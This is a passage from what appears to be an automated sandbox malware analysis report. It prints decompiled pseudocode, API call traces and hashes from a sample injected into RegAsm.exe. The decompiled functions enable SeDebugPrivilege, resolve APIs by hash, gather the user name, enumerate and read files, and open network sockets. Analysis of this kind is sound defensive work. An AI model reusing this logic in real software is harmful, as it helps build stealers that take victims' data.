                                                                                          0x00000000
                                                                                          0x00403e01
                                                                                          0x00403e10
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00403e75
                                                                                          0x00403e7f
                                                                                          0x00403e8c
                                                                                          0x00403e8e
                                                                                          0x00403e97
                                                                                          0x00000000

                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileFind$FirstNext
                                                                                          • String ID: %s\%s$%s\*$Program Files$Windows
                                                                                          • API String ID: 1690352074-2009209621
                                                                                          • Opcode ID: 3fde6c4a7a317932b4cb7643a4a2b0d3a30bf33187a4660f93c72fe85a5a4082
                                                                                          • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                                                                          • Opcode Fuzzy Hash: 3fde6c4a7a317932b4cb7643a4a2b0d3a30bf33187a4660f93c72fe85a5a4082
                                                                                          • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 78%
                                                                                          			E0040650A(void* __eax, void* __ebx, void* __eflags) {
                                                                                          				void* _v8;
                                                                                          				struct _LUID _v16;
                                                                                          				intOrPtr _v20;
                                                                                          				intOrPtr _v24;
                                                                                          				struct _TOKEN_PRIVILEGES _v32;
                                                                                          				intOrPtr* _t13;
                                                                                          				void* _t14;
                                                                                          				int _t16;
                                                                                          				int _t31;
                                                                                          				void* _t32;
                                                                                          
                                                                                          				_t31 = 0;
                                                                                          				E004060AC();
                                                                                          				_t32 = __eax;
                                                                                          				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                                                                                          				_t14 =  *_t13(_t32, 0x28,  &_v8);
                                                                                          				if(_t14 != 0) {
                                                                                          					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
                                                                                          					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
                                                                                          					if(_t16 != 0) {
                                                                                          						_push(__ebx);
                                                                                          						_v32.Privileges = _v16.LowPart;
                                                                                          						_v32.PrivilegeCount = 1;
                                                                                          						_v24 = _v16.HighPart;
                                                                                          						_v20 = 2;
                                                                                          						E004031E5(1, 9, 0xc1642df2, 0, 0);
                                                                                          						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
                                                                                          						_t31 =  !=  ? 1 : 0;
                                                                                          					}
                                                                                          					E00403C40(_v8);
                                                                                          					return _t31;
                                                                                          				}
                                                                                          				return _t14;
                                                                                          			}













                                                                                          0x00406512
                                                                                          0x00406514
                                                                                          0x00406522
                                                                                          0x00406524
                                                                                          0x00406530
                                                                                          0x00406534
                                                                                          0x0040653f
                                                                                          0x0040654e
                                                                                          0x00406552
                                                                                          0x0040655a
                                                                                          0x0040655f
                                                                                          0x0040656d
                                                                                          0x00406570
                                                                                          0x00406573
                                                                                          0x0040657a
                                                                                          0x00406589
                                                                                          0x0040658d
                                                                                          0x00406590
                                                                                          0x00406594
                                                                                          0x00000000
                                                                                          0x0040659a
                                                                                          0x004065a1

                                                                                          APIs
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                                                                          • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                          • String ID: SeDebugPrivilege
                                                                                          • API String ID: 3615134276-2896544425
                                                                                          • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                                                                          • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                                                                          • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                                                                          • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E00402B7C(long _a4) {
                                                                                          				void* _t4;
                                                                                          				void* _t7;
                                                                                          
                                                                                          				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                                                                                          				_t7 = _t4;
                                                                                          				if(_t7 != 0) {
                                                                                          					E00402B4E(_t7, 0, _a4);
                                                                                          				}
                                                                                          				return _t7;
                                                                                          			}





                                                                                          0x00402b8c
                                                                                          0x00402b92
                                                                                          0x00402b96
                                                                                          0x00402b9e
                                                                                          0x00402ba3
                                                                                          0x00402baa

                                                                                          APIs
                                                                                          • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 1357844191-0
                                                                                          • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                                                          • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                                                                          • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                                                          • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E00406069(WCHAR* _a4, DWORD* _a8) {
                                                                                          				int _t4;
                                                                                          				void* _t5;
                                                                                          
                                                                                          				E004031E5(_t5, 9, 0xd4449184, 0, 0);
                                                                                          				_t4 = GetUserNameW(_a4, _a8); // executed
                                                                                          				return _t4;
                                                                                          			}





                                                                                          0x00406077
                                                                                          0x00406082
                                                                                          0x00406085

                                                                                          APIs
                                                                                          • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: NameUser
                                                                                          • String ID:
                                                                                          • API String ID: 2645101109-0
                                                                                          • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                                                                          • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                                                                                          • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                                                                          • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: recv
                                                                                          • String ID:
                                                                                          • API String ID: 1507349165-0
                                                                                          • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                                                          • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                                                                          • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                                                          • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 335 4061c3-4061f2 call 402bf2 call 4031e5 341 4061f4-4061ff GetLastError 335->341 342 40622a-40623b call 402b7c 335->342 343 406201-406203 341->343 344 406208-406228 call 4060ac call 4031e5 341->344 350 40624c-406258 call 402b7c 342->350 351 40623d-406249 call 40338c 342->351 346 406329-40632e 343->346 344->342 344->343 358 406269-406290 call 4031e5 GetTokenInformation 350->358 359 40625a-406266 call 40338c 350->359 351->350 365 406292-4062a0 call 402b7c 358->365 366 4062fe-406302 358->366 359->358 365->366 377 4062a2-4062b9 call 406086 365->377 367 406304-406307 call 403c40 366->367 368 40630d-40630f 366->368 376 40630c 367->376 372 406311-406317 call 402bab 368->372 373 406318-40631e 368->373 372->373 374 406320-406326 call 402bab 373->374 375 406327 373->375 374->375 375->346 376->368 384 4062f5-4062fd call 402bab 377->384 385 4062bb-4062e4 call 4031e5 LookupAccountSidW 377->385 384->366 385->384 390 4062e6-4062ec call 405b6f 385->390 392 4062f1-4062f3 390->392 392->384
                                                                                          C-Code - Quality: 81%
                                                                                          			E004061C3(void* __eax, void* __ebx, void* __eflags) {
                                                                                          				WCHAR* _v8;
                                                                                          				long _v12;
                                                                                          				void** _v16;
                                                                                          				WCHAR* _v20;
                                                                                          				long _v24;
                                                                                          				long _v28;
                                                                                          				union _SID_NAME_USE _v32;
                                                                                          				intOrPtr* _t25;
                                                                                          				WCHAR* _t27;
                                                                                          				WCHAR* _t30;
                                                                                          				WCHAR* _t31;
                                                                                          				WCHAR* _t36;
                                                                                          				WCHAR* _t37;
                                                                                          				WCHAR* _t40;
                                                                                          				WCHAR* _t41;
                                                                                          				long _t44;
                                                                                          				intOrPtr* _t45;
                                                                                          				WCHAR* _t46;
                                                                                          				void* _t48;
                                                                                          				WCHAR* _t49;
                                                                                          				WCHAR* _t67;
                                                                                          				void* _t68;
                                                                                          				void* _t74;
                                                                                          
                                                                                          				_t48 = __ebx;
                                                                                          				_t67 = 0;
                                                                                          				_v8 = 0;
                                                                                          				E00402BF2();
                                                                                          				_t68 = __eax;
                                                                                          				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
                                                                                          				_t2 =  &_v8; // 0x414449
                                                                                          				_push(1);
                                                                                          				_push(8);
                                                                                          				_push(_t68);
                                                                                          				if( *_t25() != 0) {
                                                                                          					L4:
                                                                                          					_t27 = E00402B7C(0x208);
                                                                                          					_v20 = _t27;
                                                                                          					__eflags = _t27;
                                                                                          					if(_t27 != 0) {
                                                                                          						E0040338C(_t27, _t67, 0x104);
                                                                                          						_t74 = _t74 + 0xc;
                                                                                          					}
                                                                                          					_push(_t48);
                                                                                          					_t49 = E00402B7C(0x208);
                                                                                          					__eflags = _t49;
                                                                                          					if(_t49 != 0) {
                                                                                          						E0040338C(_t49, _t67, 0x104);
                                                                                          						_t74 = _t74 + 0xc;
                                                                                          					}
                                                                                          					_v28 = 0x208;
                                                                                          					_v24 = 0x208;
                                                                                          					_t7 =  &_v8; // 0x414449
                                                                                          					_v12 = _t67;
                                                                                          					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
                                                                                          					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
                                                                                          					__eflags = _t30;
                                                                                          					if(_t30 == 0) {
                                                                                          						_t36 = E00402B7C(_v12);
                                                                                          						_v16 = _t36;
                                                                                          						__eflags = _t36;
                                                                                          						if(_t36 != 0) {
                                                                                          							_t14 =  &_v8; // 0x414449, executed
                                                                                          							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
                                                                                          							__eflags = _t37;
                                                                                          							if(_t37 != 0) {
                                                                                          								E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
                                                                                          								_t40 = LookupAccountSidW(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
                                                                                          								__eflags = _t40;
                                                                                          								if(__eflags != 0) {
                                                                                          									_t41 = E00405B6F(__eflags, L"%s", _t49); // executed
                                                                                          									_t67 = _t41;
                                                                                          								}
                                                                                          							}
                                                                                          							E00402BAB(_v16);
                                                                                          						}
                                                                                          					}
                                                                                          					__eflags = _v8;
                                                                                          					if(_v8 != 0) {
                                                                                          						E00403C40(_v8); // executed
                                                                                          					}
                                                                                          					__eflags = _t49;
                                                                                          					if(_t49 != 0) {
                                                                                          						E00402BAB(_t49);
                                                                                          					}
                                                                                          					_t31 = _v20;
                                                                                          					__eflags = _t31;
                                                                                          					if(_t31 != 0) {
                                                                                          						E00402BAB(_t31);
                                                                                          					}
                                                                                          					return _t67;
                                                                                          				}
                                                                                          				_t44 = GetLastError();
                                                                                          				if(_t44 == 0x3f0) {
                                                                                          					E004060AC();
                                                                                          					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                                                                                          					_t3 =  &_v8; // 0x414449
                                                                                          					_t46 =  *_t45(_t44, 8, _t3);
                                                                                          					__eflags = _t46;
                                                                                          					if(_t46 == 0) {
                                                                                          						goto L2;
                                                                                          					}
                                                                                          					goto L4;
                                                                                          				}
                                                                                          				L2:
                                                                                          				return 0;
                                                                                          			}


























                                                                                          0x004061c3
                                                                                          0x004061cb
                                                                                          0x004061cd
                                                                                          0x004061d0
                                                                                          0x004061de
                                                                                          0x004061e0
                                                                                          0x004061e5
                                                                                          0x004061e9
                                                                                          0x004061eb
                                                                                          0x004061ed
                                                                                          0x004061f2
                                                                                          0x0040622a
                                                                                          0x00406230
                                                                                          0x00406235
                                                                                          0x00406239
                                                                                          0x0040623b
                                                                                          0x00406244
                                                                                          0x00406249
                                                                                          0x00406249
                                                                                          0x0040624c
                                                                                          0x00406253
                                                                                          0x00406256
                                                                                          0x00406258
                                                                                          0x00406261
                                                                                          0x00406266
                                                                                          0x00406266
                                                                                          0x00406270
                                                                                          0x00406273
                                                                                          0x00406276
                                                                                          0x0040627b
                                                                                          0x0040627e
                                                                                          0x0040628c
                                                                                          0x0040628e
                                                                                          0x00406290
                                                                                          0x00406295
                                                                                          0x0040629a
                                                                                          0x0040629e
                                                                                          0x004062a0
                                                                                          0x004062ac
                                                                                          0x004062af
                                                                                          0x004062b7
                                                                                          0x004062b9
                                                                                          0x004062c9
                                                                                          0x004062e0
                                                                                          0x004062e2
                                                                                          0x004062e4
                                                                                          0x004062ec
                                                                                          0x004062f3
                                                                                          0x004062f3
                                                                                          0x004062e4
                                                                                          0x004062f8
                                                                                          0x004062fd
                                                                                          0x004062a0
                                                                                          0x004062fe
                                                                                          0x00406302
                                                                                          0x00406307
                                                                                          0x0040630c
                                                                                          0x0040630d
                                                                                          0x0040630f
                                                                                          0x00406312
                                                                                          0x00406317
                                                                                          0x00406318
                                                                                          0x0040631c
                                                                                          0x0040631e
                                                                                          0x00406321
                                                                                          0x00406326
                                                                                          0x00000000
                                                                                          0x00406327
                                                                                          0x004061f4
                                                                                          0x004061ff
                                                                                          0x00406208
                                                                                          0x00406218
                                                                                          0x0040621d
                                                                                          0x00406224
                                                                                          0x00406226
                                                                                          0x00406228
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00406228
                                                                                          0x00406201
                                                                                          0x00000000

                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                                                                          • _wmemset.LIBCMT ref: 00406244
                                                                                          • _wmemset.LIBCMT ref: 00406261
                                                                                          • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                                                                          • LookupAccountSidW.ADVAPI32(00000000,?,?,?,00000000,?,?,00000009,C0862E2B,00000000,00000000), ref: 004062E0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _wmemset$AccountErrorInformationLastLookupToken
                                                                                          • String ID: IDA$IDA
                                                                                          • API String ID: 3235442692-2020647798
                                                                                          • Opcode ID: 6a3663808dfaa6d95fd1668e0b1524eecee507b0f262261fb703967b84d3d722
                                                                                          • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                                                                          • Opcode Fuzzy Hash: 6a3663808dfaa6d95fd1668e0b1524eecee507b0f262261fb703967b84d3d722
                                                                                          • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 721 404e17-404e57 getaddrinfo 722 404e59-404e5b 721->722 723 404e5d-404e84 call 402b7c socket 721->723 724 404ecf-404ed3 722->724 727 404e86-404e96 call 402bab freeaddrinfo 723->727 728 404e98-404ea7 connect 723->728 736 404ec7-404ec9 727->736 729 404eb3-404ebe freeaddrinfo 728->729 730 404ea9-404eb1 call 404de5 728->730 734 404ec0-404ec6 call 402bab 729->734 735 404ecb 729->735 730->729 734->736 739 404ecd-404ece 735->739 736->739 739->724
                                                                                          C-Code - Quality: 37%
                                                                                          			E00404E17(intOrPtr _a4, intOrPtr _a8) {
                                                                                          				signed int _v8;
                                                                                          				intOrPtr _v28;
                                                                                          				intOrPtr _v32;
                                                                                          				intOrPtr _v36;
                                                                                          				void _v40;
                                                                                          				void* _t23;
                                                                                          				signed int _t24;
                                                                                          				signed int* _t25;
                                                                                          				signed int _t30;
                                                                                          				signed int _t31;
                                                                                          				signed int _t33;
                                                                                          				signed int _t41;
                                                                                          				void* _t42;
                                                                                          				signed int* _t43;
                                                                                          
                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                          				_t33 = 8;
                                                                                          				memset( &_v40, 0, _t33 << 2);
                                                                                          				_v32 = 1;
                                                                                          				_t23 =  &_v40;
                                                                                          				_v28 = 6;
                                                                                          				_v36 = 2;
                                                                                          				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
                                                                                          				if(_t23 == 0) {
                                                                                          					_t24 = E00402B7C(4);
                                                                                          					_t43 = _t24;
                                                                                          					_t31 = _t30 | 0xffffffff;
                                                                                          					 *_t43 = _t31;
                                                                                          					_t41 = _v8;
                                                                                          					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
                                                                                          					 *_t43 = _t24;
                                                                                          					if(_t24 != _t31) {
                                                                                          						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
                                                                                          						if(_t24 == _t31) {
                                                                                          							E00404DE5(_t24,  *_t43);
                                                                                          							 *_t43 = _t31;
                                                                                          						}
                                                                                          						__imp__freeaddrinfo(_v8);
                                                                                          						if( *_t43 != _t31) {
                                                                                          							_t25 = _t43;
                                                                                          							goto L10;
                                                                                          						} else {
                                                                                          							E00402BAB(_t43);
                                                                                          							L8:
                                                                                          							_t25 = 0;
                                                                                          							L10:
                                                                                          							return _t25;
                                                                                          						}
                                                                                          					}
                                                                                          					E00402BAB(_t43);
                                                                                          					__imp__freeaddrinfo(_v8);
                                                                                          					goto L8;
                                                                                          				}
                                                                                          				return 0;
                                                                                          			}

















                                                                                          0x00404e1d
                                                                                          0x00404e26
                                                                                          0x00404e2a
                                                                                          0x00404e2f
                                                                                          0x00404e37
                                                                                          0x00404e3a
                                                                                          0x00404e45
                                                                                          0x00404e4f
                                                                                          0x00404e57
                                                                                          0x00404e61
                                                                                          0x00404e66
                                                                                          0x00404e68
                                                                                          0x00404e6c
                                                                                          0x00404e6e
                                                                                          0x00404e7a
                                                                                          0x00404e80
                                                                                          0x00404e84
                                                                                          0x00404e9f
                                                                                          0x00404ea7
                                                                                          0x00404eab
                                                                                          0x00404eb1
                                                                                          0x00404eb1
                                                                                          0x00404eb6
                                                                                          0x00404ebe
                                                                                          0x00404ecb
                                                                                          0x00000000
                                                                                          0x00404ec0
                                                                                          0x00404ec1
                                                                                          0x00404ec7
                                                                                          0x00404ec7
                                                                                          0x00404ecd
                                                                                          0x00000000
                                                                                          0x00404ece
                                                                                          0x00404ebe
                                                                                          0x00404e87
                                                                                          0x00404e90
                                                                                          0x00000000
                                                                                          0x00404e90
                                                                                          0x00000000

                                                                                          APIs
                                                                                          • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                                                                          • socket.WS2_32(?,?,?), ref: 00404E7A
                                                                                          • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: freeaddrinfogetaddrinfosocket
                                                                                          • String ID:
                                                                                          • API String ID: 2479546573-0
                                                                                          • Opcode ID: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
                                                                                          • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                                                                          • Opcode Fuzzy Hash: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
                                                                                          • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 741 4040bb-4040f2 call 4031e5 CreateFileW 744 4040f8-404111 call 4031e5 741->744 745 40418d-404190 741->745 756 404113-404119 744->756 757 40417a 744->757 747 404192-4041a7 call 403c90 745->747 748 404184 745->748 747->748 753 4041a9-4041b8 call 403c59 747->753 750 404186-40418c 748->750 761 4041ba-4041d8 call 4040bb call 403d44 753->761 762 4041db-4041e4 call 402bab 753->762 756->757 760 40411b-404120 756->760 759 40417d-40417e call 403c40 757->759 768 404183 759->768 764 404122 760->764 765 404124-404140 call 4031e5 VirtualAlloc 760->765 761->762 762->750 764->765 765->757 774 404142-40415e call 4031e5 ReadFile 765->774 768->748 774->759 778 404160-404178 call 4031e5 774->778 778->759
                                                                                          C-Code - Quality: 74%
                                                                                          			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
                                                                                          				struct _SECURITY_ATTRIBUTES* _v8;
                                                                                          				char _v12;
                                                                                          				long _v16;
                                                                                          				void* __ebx;
                                                                                          				void* __edi;
                                                                                          				void* _t16;
                                                                                          				intOrPtr* _t25;
                                                                                          				long* _t28;
                                                                                          				void* _t30;
                                                                                          				int _t32;
                                                                                          				intOrPtr* _t33;
                                                                                          				void* _t35;
                                                                                          				void* _t42;
                                                                                          				intOrPtr _t43;
                                                                                          				long _t44;
                                                                                          				struct _OVERLAPPED* _t46;
                                                                                          
                                                                                          				_t46 = 0;
                                                                                          				_t35 = 0;
                                                                                          				E004031E5(0, 0, 0xe9fabb88, 0, 0);
                                                                                          				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                                                          				_t42 = _t16;
                                                                                          				_v8 = _t42;
                                                                                          				if(_t42 == 0xffffffff) {
                                                                                          					__eflags = _a12;
                                                                                          					if(_a12 == 0) {
                                                                                          						L10:
                                                                                          						return _t35;
                                                                                          					}
                                                                                          					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
                                                                                          					__eflags = _t43;
                                                                                          					if(_t43 == 0) {
                                                                                          						goto L10;
                                                                                          					}
                                                                                          					_push(0);
                                                                                          					__eflags = E00403C59(_a4, _t43);
                                                                                          					if(__eflags != 0) {
                                                                                          						_v8 = 0;
                                                                                          						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
                                                                                          						_push(_t43);
                                                                                          						 *_a8 = _v8;
                                                                                          						E00403D44();
                                                                                          					}
                                                                                          					E00402BAB(_t43);
                                                                                          					return _t46;
                                                                                          				}
                                                                                          				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
                                                                                          				_t44 =  *_t25(_t42,  &_v12);
                                                                                          				if(_v12 != 0 || _t44 > 0x40000000) {
                                                                                          					L8:
                                                                                          					_t45 = _v8;
                                                                                          					goto L9;
                                                                                          				} else {
                                                                                          					_t28 = _a8;
                                                                                          					if(_t28 != 0) {
                                                                                          						 *_t28 = _t44;
                                                                                          					}
                                                                                          					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
                                                                                          					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
                                                                                          					_t35 = _t30;
                                                                                          					if(_t35 == 0) {
                                                                                          						goto L8;
                                                                                          					} else {
                                                                                          						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
                                                                                          						_t45 = _v8;
                                                                                          						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
                                                                                          						if(_t32 == 0) {
                                                                                          							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
                                                                                          							 *_t33(_t35, _t46, 0x8000);
                                                                                          							_t35 = _t46;
                                                                                          						}
                                                                                          						L9:
                                                                                          						E00403C40(_t45); // executed
                                                                                          						goto L10;
                                                                                          					}
                                                                                          				}
                                                                                          			}



















                                                                                          0x004040c4
                                                                                          0x004040ce
                                                                                          0x004040d0
                                                                                          0x004040e8
                                                                                          0x004040ea
                                                                                          0x004040ec
                                                                                          0x004040f2
                                                                                          0x0040418d
                                                                                          0x00404190
                                                                                          0x00404184
                                                                                          0x00000000
                                                                                          0x00404184
                                                                                          0x004041a0
                                                                                          0x004041a5
                                                                                          0x004041a7
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x004041a9
                                                                                          0x004041b6
                                                                                          0x004041b8
                                                                                          0x004041be
                                                                                          0x004041cb
                                                                                          0x004041d0
                                                                                          0x004041d1
                                                                                          0x004041d3
                                                                                          0x004041d8
                                                                                          0x004041dc
                                                                                          0x00000000
                                                                                          0x004041e2
                                                                                          0x00404100
                                                                                          0x0040410c
                                                                                          0x00404111
                                                                                          0x0040417a
                                                                                          0x0040417a
                                                                                          0x00000000
                                                                                          0x0040411b
                                                                                          0x0040411b
                                                                                          0x00404120
                                                                                          0x00404122
                                                                                          0x00404122
                                                                                          0x0040412c
                                                                                          0x0040413a
                                                                                          0x0040413c
                                                                                          0x00404140
                                                                                          0x00000000
                                                                                          0x00404142
                                                                                          0x0040414a
                                                                                          0x00404155
                                                                                          0x0040415a
                                                                                          0x0040415e
                                                                                          0x00404168
                                                                                          0x00404174
                                                                                          0x00404176
                                                                                          0x00404176
                                                                                          0x0040417d
                                                                                          0x0040417e
                                                                                          0x00000000
                                                                                          0x00404183
                                                                                          0x00404140

                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                                                                          Strings
                                                                                          Memory Dump Source
